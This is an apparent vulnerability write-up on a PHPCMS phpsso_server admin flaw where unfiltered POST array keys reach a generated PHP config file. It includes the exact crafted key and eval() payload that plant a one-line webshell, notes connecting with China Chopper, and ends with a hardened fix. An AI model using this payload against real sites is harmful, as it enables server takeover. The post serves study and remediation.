The idea comes from http://www.cnbraid.com/2016/09/18/phpcms/
I reproduced it here myself and wrote up my own version.
Since it is in the admin backend, you also have to log in twice, so it is not very practical; it is mainly for learning.
The vulnerability is in ROOTDIR/phpsso_server/phpcms/modules/admin/system.php:
public function uc() {
    if (isset($_POST['dosubmit'])) {
        $data = isset($_POST['data']) ? $_POST['data'] : '';
        $data['ucuse'] = isset($_POST['ucuse']) && intval($_POST['ucuse']) ? intval($_POST['ucuse']) : 0;
        $filepath = CACHE_PATH.'configs'.DIRECTORY_SEPARATOR.'system.php';
        $config = include $filepath;
        $uc_config = '<?php '."\ndefine('UC_CONNECT', 'mysql');\n";
        foreach ($data as $k => $v) {
            $old[] = "'$k'=>'".(isset($config[$k]) ? $config[$k] : $v)."',";
            $new[] = "'$k'=>'$v',";
            $uc_config .= "define('".strtoupper($k)."', '$v');\n";
        }
        $html = file_get_contents($filepath);
        $html = str_replace($old, $new, $html);
        $uc_config_filepath = CACHE_PATH.'configs'.DIRECTORY_SEPARATOR.'uc_config.php';
        @file_put_contents($uc_config_filepath, $uc_config);
        @file_put_contents($filepath, $html);
        $this->db->insert(array('name'=>'ucenter', 'data'=>array2string($data)), 1,1);
        showmessage(L('operation_success'), HTTP_REFERER);
    }
    $data = array();
    $r = $this->db->get_one(array('name'=>'ucenter'));
    if ($r) {
        $data = string2array($r['data']);
    }
    include $this->admin_tpl('system_uc');
}
It comes from this part of the function:
$data = isset($_POST['data']) ? $_POST['data'] : '';
and
foreach ($data as $k => $v) {
    $old[] = "'$k'=>'".(isset($config[$k]) ? $config[$k] : $v)."',";
    $new[] = "'$k'=>'$v',";
    $uc_config .= "define('".strtoupper($k)."', '$v');\n";
}
Here the keys and values of POST['data'] are received and written into the configuration file ROOTDIR/phpsso_server/caches/configs/uc_config.php.
In ROOTDIR/phpcms/libs/classes/param.class.php:
public function __construct() {
    if(!get_magic_quotes_gpc()) {
        $_POST = new_addslashes($_POST);
        $_GET = new_addslashes($_GET);
        $_REQUEST = new_addslashes($_REQUEST);
        $_COOKIE = new_addslashes($_COOKIE);
    }
    // ... (rest of the constructor not shown)
}
POST is filtered globally, but only the values are filtered; the keys are not.
So here we can construct
name="data[uc_api','11');/*]"
and enter in the Ucenter API address field: */eval($_REQUEST[test]);//
and a one-line webshell is written successfully.
China Chopper (菜刀) connects successfully.
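The root cause is that both the array key and the value are interpolated straight into PHP source. The following is an added example of a hardened way to generate uc_config.php; it is not PHPCMS's own code. It assumes $data is the same $_POST['data'] array as in uc(), and the key whitelist UC_ALLOWED_KEYS is an assumption (only uc_api and ucuse appear on this page; the other names are the usual UCenter settings).

```php
<?php
// Added example, not PHPCMS code: generate uc_config.php without letting
// attacker-controlled keys or values break out of the PHP string literals.

// Assumed whitelist: only configuration keys the feature actually needs.
const UC_ALLOWED_KEYS = ['uc_api', 'uc_ip', 'uc_appid', 'uc_key',
                         'uc_charset', 'uc_dbtablepre', 'ucuse'];

function build_uc_config(array $data): string
{
    $out = "<?php\ndefine('UC_CONNECT', 'mysql');\n";
    foreach ($data as $k => $v) {
        // In the original code $k is never filtered (new_addslashes only
        // touches values), so a key like "uc_api','11');/*" closes the
        // string and the define() call. A strict whitelist removes that path.
        if (!in_array($k, UC_ALLOWED_KEYS, true)) {
            throw new InvalidArgumentException(
                'unexpected config key: ' . var_export($k, true));
        }
        // var_export() emits the value as a properly quoted PHP string
        // literal, so quotes and comment sequences stay inside the string.
        $out .= 'define(' . var_export(strtoupper($k), true) . ', '
              . var_export((string) $v, true) . ");\n";
    }
    return $out;
}

// Constructed sample input: the malicious key from this post is rejected,
// and a benign value containing quotes is emitted as an escaped literal.
try {
    build_uc_config(["uc_api','11');/*" => '*/eval($_REQUEST[test]);//']);
} catch (InvalidArgumentException $e) {
    echo "rejected: " . $e->getMessage() . "\n";
}
echo build_uc_config(['uc_api' => "http://sso.example.test/it's", 'ucuse' => '1']);
```

Writing the file with var_export() instead of str_replace() on system.php also avoids the second write path in uc(), which splices raw values into an existing PHP file.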
This article was compiled by HackBraid; original link: http://www.cnbraid.com/2016/09/18/phpcms/. Please contact the author for reprint permission.